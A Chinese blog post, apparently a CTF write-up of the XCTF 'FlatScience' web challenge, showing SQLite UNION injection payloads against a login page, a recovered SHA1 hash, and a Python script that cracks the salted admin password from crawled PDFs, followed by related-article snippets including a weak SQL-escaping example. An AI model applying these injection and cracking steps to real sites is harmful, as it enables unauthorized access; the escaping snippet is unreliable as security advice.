攻防世界 web FlatScience

最新推荐文章于 2025-05-12 11:19:37 发布
原创 最新推荐文章于 2025-05-12 11:19:37 发布 · 492 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细解析了如何通过SQL注入技术破解网站登录过程,利用SQLite数据库特性,进行联合查询获取关键信息,包括管理员用户名、密码及其提示。并介绍了如何下载网站PDF文件,使用脚本进行文本转换及SHA1密码比对,最终找到管理员密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

http://39.96.86.88/2020/04/03/

打开网页后每个转跳都点一下发现都是pdf文件除了here
在这里插入图片描述
进入了根目录1,然后点here或者these会进入不同的根目录。
这也太难看出其中的奥秘了,用dirsearch跑一下。
在这里插入图片描述
经过测试后:发现login.php与admin.php是解题的关键
admin.php的源代码提示了不要绕过,虽然大多数题目都会这样说。
在这里插入图片描述
在login.php的源代码里找到了提示
在这里插入图片描述
加上 ?debuf 出现源码
通过网页输入而且连接sqlite数据库,这无疑是SQLite注入了。
SQLite数据库自带sqlite_master表。
在这里插入图片描述
查询 usr=‘ union select name,sql from sqlite_master&pw=
在这里插入图片描述通过set-cookie发现Users里面有这几个表

id int primary key
name varchar
password varchar
hint varchar

于是利用联合查询一个一个看:
UNION :合并两个或者两个以上的SQL语句(默认地,UNION 操作符选取不同的值)
UNION ALL:合并操作符相同的几个SQL语句

usr=%27 UNION SELECT id, name from Users--+&pw=chybeta
//name=+admin
usr=%27 UNION SELECT id, password from Users--+&pw=chybeta
//name=+3fab54a50e770d830c0416df817567662a9dc85c
usr=%27 UNION SELECT id, hint from Users--+&pw=chybeta
// name=+my+fav+word+in+my+fav+paper%3F%21

根据hint的name=+my+fav+word+in+my+fav+paper%3F%21提示可能passwrod在pdf文章的hash码中。

结合前面源代码里的password加密,先用wget将网站的全部pdf文件down下来。

wget ip -r -np -nd -A .pdf

然后用脚本拼接上"Salz"后hash加密与前面注入得出的password比较,这样就可以得出管理员得密码了
在这里插入图片描述我的kali炸了,以后再实机演示。

下面贴出大佬的脚本:

from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
 
if __name__ == "__main__":
	find_password()

这道题碰巧可以用另一种方法,账户密码刚好可以md解密出来
在这里插入图片描述去掉后面的Salz!,管理员登陆得到flag
在这里插入图片描述

没写完,明天再来。
https://blog.youkuaiyun.com/zz_caleb/article/details/89323133

攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 362
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界 WEB FlatScience
qq_41696858的博客
08-24 296
听说这个题一开始是个1分题。。。。what??????? 这题结合了sql注入,爬虫爬取以及pdf识别内容和sha1撞库,你告诉我只有一分???????好吧,可能是我太菜了 打开场景,一堆a链接,打开看到是一堆pdf,查找一下发现也没有啥,扫描一波目录,发现robots.txt,进去看看 发现login.php和admin.php,尝试sql注入,admin页面根本没回显,好吧,那么有问题的页面就只剩一个login.php了 先尝试一个简单的单引号1’,有回显,sqlite数据库,id是注入点,后面密码明显
攻防世界-web-FlatScience
wuh2333的博客
10-25 958
攻防世界webFlatScience
web安全-ics-06-攻防世界(详解)
最新发布
2303_80806493的博客
05-12 387
在云平台报表中心,设备管理基础服务的数据被删除,仅留下一处入侵者痕迹。通过分析,发现报表中心功能的URL后缀为index.php?id=1,疑似存在SQL注入漏洞。初步测试未发现URL变化,转而尝试爆破id值。使用Burp Suite对id值进行1-10000的爆破,发现id=2333的响应长度与其他不同。访问id=2333后,成功获取flag:cyberpeace{2e09d93151b515ae1e1cc4529081a2b8}。
攻防世界-FlatScience
qq_44418229的博客
07-24 885
sqlite注入和sql注入的区别 sha1()函数的相关内容 setcookie()函数的相关内容
攻防世界FlatScience
wangzhemvp的博客
04-06 1338
想到在查看 robots.txt 的时候有个 admin.php,选 admin 来破解,根据 hint 猜测 fav word 藏在前面看到的 pdf 里面,需要写个脚本,把里面的词都给提取出来,拼接上”Salz!想办法把 pdf 文件都给爬下来。输入 http://61.147.171.105:61912/login.php/name 等同于 if 语句中的 id,sql 等同于 name。在login.php 中发现。
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
CTF 攻防世界 Web: FlatScience write-up
qq_60256199的博客
12-15 791
CTF 攻防世界 Web: FlatScience
[CTF题目总结-web篇]攻防世界flatscience
T2hunz1
01-13 1864
[CTF题目总结-web篇]攻防世界flatscience
攻防世界WEB进阶之FlatScience
harry_c的博客
09-30 5772
攻防世界WEB进阶之FlatScience一、分析二、实操三、答案 FlatScience 难度系数: 1星 题目来源: Hack.lu-2017 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 点击打开场景,发现都是文件下载的内容,是几篇英文文献 上一题有用到的robots.txt,构造一下http://IP:端口/robots.txt 果然有重要内容: 二、实操 分别进入像个网站...
攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 764
攻防世界WEB】四星12分
攻防世界web进阶区FlatScience详解
hxhxhxhxx的博客
08-06 3656
攻防世界web进阶区FlatScience题目解法 题目 解法 我们一个一个点进去发现也就是一些论文之类的 我们御剑发现了一些东西 robots。txt 我们登录试试 在login页面有报错,我们猜测是sql注入 他的源码中写到,登录是你不可能绕过的 这里源码中出现了?debug,可能是一个调试页面,我们访问看看 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['u
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 934
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
攻防世界】二十四 --- FlatScience --- SQLite注入
qq_43168364的博客
01-26 1467
题目 ---- FlatScience 一、writeup 二、知识点
攻防世界web进阶区FlatScience
gongjingege的博客
08-05 340
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
攻防世界-Web高手进阶区-FlatScience
feng的博客
09-13 752
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界--game
weixin_30876945的博客
08-17 1321
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074 1.准备 打开测试用例 首先分析程序 得到是win32程序 2.第一种方法 2.1 分析代码 使用IDA打开,找到main函数,F5得到C代码 得知主要是...
攻防世界 FlatScience
CyhDl666的博客
02-25 417
各种here these 一个个点 url不断变化 直接dirsearch扫描一些 - 最近做题经常做到robots.txt!!!1 访问了一下 也是给了admin.php 和 login.php 访问login界面是个登录窗 访问admin界面也是登录窗 不过账号已经给你了 看到登录界面难面尝试一下sql注入 这里我想到以前做个的一个sql注入加md5加密的题目 但是这个得需要知道查询的代码 没学过sqlite3 无奈wp CppSQLite3Queryquery = db.execQue.
攻防世界web
03-23
### 推荐的网络安全攻防 Web 学习资源 以下是几个推荐的学习资源,这些资料可以帮助初学者了解网络安全攻防的基础知识并逐步深入: #### 1. **Web 安全基础** - 可以从一份名为《Web安全攻防入门教程》的内容入手,它提供了关于 Web 安全的基础概念、常见的攻击类型及其防御技术的详细介绍[^1]。此教程适合那些刚开始接触 Web 安全领域的人。 #### 2. **系统化的学习路径** - 对于更全面的知识体系,《网络安全入门 5 天速成教程-WEB 安全渗透攻防技术》是一个不错的选择。该文档不仅包含了网络协议分析,还涉及漏洞利用和内网渗透等方面的技术细节[^2]。这份笔记经过精心整理,能有效减少学习过程中的混乱感。 #### 3. **综合性的网络安全指南** - 如果想进一步扩展视野,则可以参考《网络安全攻防:概述》,其中除了涵盖基本的安全法规外,还包括了渗透测试技巧、具体漏洞解析等内容[^3]。这对于构建完整的网络安全知识框架非常有帮助。 #### 4. **实践导向的演练材料** - 关于如何实际操作层面提升自己的技能水平,《网络攻防演练.网络安全.学习》这篇文章给出了很好的指导方向。文章强调通过模拟真实环境下的攻击行为来进行训练,并指出哪些方面需要特别注意[^4]。 ```python # 示例代码展示简单的SQL注入防护措施 def safe_query(user_input): sanitized_input = escape_special_characters(user_input) # 使用函数转义特殊字符 query = f"SELECT * FROM users WHERE username='{sanitized_input}'" return execute(query) def escape_special_characters(input_string): special_chars_map = { "'" : "''", "\"" : "\"\""} escaped_str = input_string.translate(str.maketrans(special_chars_map)) return escaped_str ``` 上述 Python 函数展示了防止 SQL 注入的一个简单例子,体现了理论联系实际的重要性。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值